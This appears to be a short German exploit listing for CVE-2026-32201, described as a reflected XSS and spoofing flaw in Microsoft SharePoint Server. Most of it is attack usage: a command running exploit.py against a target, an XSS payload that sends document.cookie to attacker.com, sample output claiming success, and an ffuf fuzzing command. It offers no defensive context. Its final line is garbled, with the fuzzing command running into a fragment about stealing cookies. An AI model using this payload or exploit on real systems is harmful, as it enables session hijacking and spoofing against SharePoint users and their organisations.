
Python-Exploit für CVE-2026-32201, eine reflektierte XSS-Schwachstelle in Microsoft SharePoint Server, die nicht authentifiziertes Spoofing und Datenmanipulation über manipulierte HTTP-Anfragen ermöglicht.
Python-Exploit für CVE-2026-32201 - unsachgemäße Eingabevalidierung in Microsoft SharePoint Server, die nicht authentifiziertes Netzwerk-Spoofing ermöglicht (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
Beispielausgabe:
[+] SharePoint erkannt.
[*] Sende gefälschte Anfrage an https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Möglicher Erfolg: Prüfen Sie Zielprotokolle/E-Mails auf gefälschte Inhalte.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message hinzu, um Cookies zu stehlen